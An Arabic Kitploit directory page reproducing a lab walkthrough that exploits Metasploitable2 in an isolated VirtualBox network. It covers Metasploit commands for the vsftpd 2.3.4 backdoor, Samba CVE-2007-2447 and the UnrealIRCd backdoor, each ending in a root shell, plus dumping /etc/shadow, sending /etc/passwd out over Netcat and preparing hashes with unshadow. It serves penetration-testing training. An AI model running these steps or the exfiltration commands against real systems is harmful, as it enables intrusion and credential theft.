Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/ethicalhackinglabs/metasploitable2-exploitation-metasploit
كسر كلمات المرورالاستطلاعأطر الاستغلالتخطيط الشبكةتحليل الثغرات الأمنيةالاستغلالتسريب البياناتاختبار الاختراقالقيادة والسيطرةالتعلم والتعليمتطوير الحمولاتمختبرات وتدريب عملي
GitHubethicalhackinglabs/metasploitable2-exploitation-metasploit

metasploitable2-exploitation-metasploit

دليل استغلال كامل باستخدام Metasploit ضد Metasploitable2 — باب خلفي لـ vsftpd، وSamba CVE-2007-2447، وباب خلفي لـ UnrealIRCd، وتسريب عبر Netcat، وتحضير تكسير بيانات الاعتماد.

عرض المستودع
22منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال Metasploitable2 باستخدام Metasploit: VSFTPD و Samba وأكثر

دليل عملي لاستغلال الثغرات باستخدام إطار Metasploit — بدءًا من إعداد قاعدة بيانات PostgreSQL وفحص db_nmap، مرورًا بثلاث واجهات شل صلبة عبر vsftpd و Samba و UnrealIRCd، وصولًا إلى استخراج بيانات الاعتماد باستخدام Netcat.


نظرة عامة

يوثق هذا المستودع جلسة استغلال كاملة باستخدام Metasploit ضد Metasploitable2 في مختبر معزول على VirtualBox. المواضيع التي يغطيها:

  • إعداد Metasploit مع محرك PostgreSQL ومساحات عمل
  • تشغيل db_nmap لحفظ نتائج الفحص مباشرة في قاعدة البيانات
  • استغلال الباب الخلفي في vsftpd 2.3.4 (اختراق سلسلة التوريد)
  • استغلال Samba CVE-2007-2447 (حقن أوامر usermap_script)
  • استخراج ملفات /etc/passwd و /etc/shadow عبر Netcat ودمجها باستخدام unshadow
  • استغلال الباب الخلفي في UnrealIRCd 3.2.8.1

بيئة المختبر

الجهازالدورعنوان IP
Kali Linux 2026.1المهاجم192.168.1.4
Metasploitable2الهدف192.168.1.3

الشبكة: 192.168.1.0/24 — شبكة NAT معزولة بالكامل داخل VirtualBox.


الخطوة 1 — إعداد Metasploit والفحص المدعوم بقاعدة البيانات

# تشغيل PostgreSQL وإعداد قاعدة البيانات (مرة واحدة فقط)
sudo systemctl start postgresql
sudo msfdb init

# تشغيل Metasploit
msfconsole

تشغيل Kali و Metasploitable2

تحديث Kali وبدء PostgreSQL

msf6> db_status           # التحقق: متصل بـ msf. نوع الاتصال: postgresql.
msf6> workspace -a 178-metasploitable2
msf6> workspace           # تأكيد مساحة العمل النشطة

مخرجات db_status و workspace

msf6> db_nmap -A 192.168.1.0/24 -n

فحص db_nmap قيد التقدم

msf6> hosts
msf6> services

مخرجات hosts و services

تم العثور على خادمي FTP على Metasploitable2:

المنفذالخدمةالمعلومات
21/tcpftpvsftpd 2.3.4
2121/tcpftpProFTPD 1.3.1

الخطوة 2 — استغلال vsftpd 2.3.4 (باب خلفي)

في يوليو 2011، تم اختراق أرشيف المصدر لـ vsftpd 2.3.4 — تم إدخال باب خلفي يفتح واجهة شل صلبة على المنفذ 6200 عندما يحتوي اسم مستخدم FTP على :). CVE: CVE-2011-2523. الفرق في الشفرة: https://pastebin.com/AetT9sS5

msf6> search type:exploit name:vsftpd
# النتيجة: exploit/unix/ftp/vsftpd_234_backdoor  (الترتيب: ممتاز)

msf6> use exploit/unix/ftp/vsftpd_234_backdoor
msf6> info

معلومات استغلال vsftpd - الجزء 1

معلومات استغلال vsftpd - الجزء 2

عرض خيارات vsftpd

تحديد RHOSTS RPORT LHOST في vsftpd

msf6> set RHOSTS 192.168.1.3
msf6> set RPORT 21
msf6> set LHOST 192.168.1.4
msf6> exploit

تنفيذ استغلال vsftpd وجلسة Meterpreter

ls على نظام الملفات الجذر عن بُعد

meterpreter> shell
whoami          # root
uname -a        # Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

مخرجات whoami root و uname -a

استخراج كلمات المرور المشفرة:

cat /etc/shadow | grep '$1'

ملف shadow مع كلمات المرور المشفرة


الخطوة 3 — استغلال Samba (CVE-2007-2447)

إصدارات Samba 3.0.0–3.0.25rc3 تمرر أحرفًا وصفية للقشرة في حقل اسم المستخدم مباشرة إلى /bin/sh عبر خيار username map script — قبل حدوث المصادقة. يعمل Metasploitable2 على Samba 3.0.20-Debian.

msf6> search type:exploit name:samba
# تم العثور على ~7 استغلالات

msf6> use exploit/multi/samba/usermap_script
msf6> info

قائمة استغلالات Samba من البحث

معلومات usermap_script لـ Samba

وصف CVE لـ Samba ومراجع

msf6> set RHOSTS 192.168.1.3
msf6> exploit

تنفيذ استغلال Samba - فتح جلسة

whoami root و smbd --version على واجهة Samba

whoami          # root
smbd --version  # Version 3.0.20-Debian

استخراج الملفات عبر Netcat

العلامة التبويبية 2 — Kali (الاستقبال):

nc -l -p 4567 > passwd.txt

العلامة التبويبية 1 — واجهة الاستغلال (الإرسال):

cat /etc/passwd | nc 192.168.1.4 4567

مستمع Netcat على Kali يستقبل passwd

محتويات passwd.txt بعد الاستخراج

كرر العملية مع /etc/shadow، ثم ادمج:

unshadow passwd.txt shadow.txt > metasploitable_logins.txt
cat metasploitable_logins.txt

الخطوة 4 — استغلال UnrealIRCd 3.2.8.1 (باب خلفي)

تم توزيع UnrealIRCd 3.2.8.1 مع باب خلفي في شفرته المصدرية. إرسال AB إلى المنفذ 6667 يجعل الخادم ينفذ أي أمر لاحق كجذر — دون الحاجة إلى مصادقة.

msf6> use exploit/unix/irc/unreal_ircd_3281_backdoor
msf6> set payload cmd/unix/bind_netcat
msf6> set RHOSTS 192.168.1.3
msf6> set LHOST 192.168.1.4
msf6> set RPORT 6667
msf6> exploit

خيارات استغلال UnrealIRCd وتنفيذه

واجهة شل جذر UnrealIRCd - whoami و uname -a

whoami   # root
uname -a # Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

الخيارات المطلوبة:

الخيارالقيمةالوصف
RHOSTS192.168.1.3عنوان IP الهدف
RPORT6667منفذ IRC الافتراضي
LHOST192.168.1.4عنوان IP لمستمع Kali
payloadcmd/unix/bind_netcatواجهة شل مقيدة عبر Netcat

سير عمل Metasploit بنظرة سريعة

db_nmap → hosts → services → search → use → info → show options → set → exploit → shell

الأخطاء الشائعة

تنزيل الأداة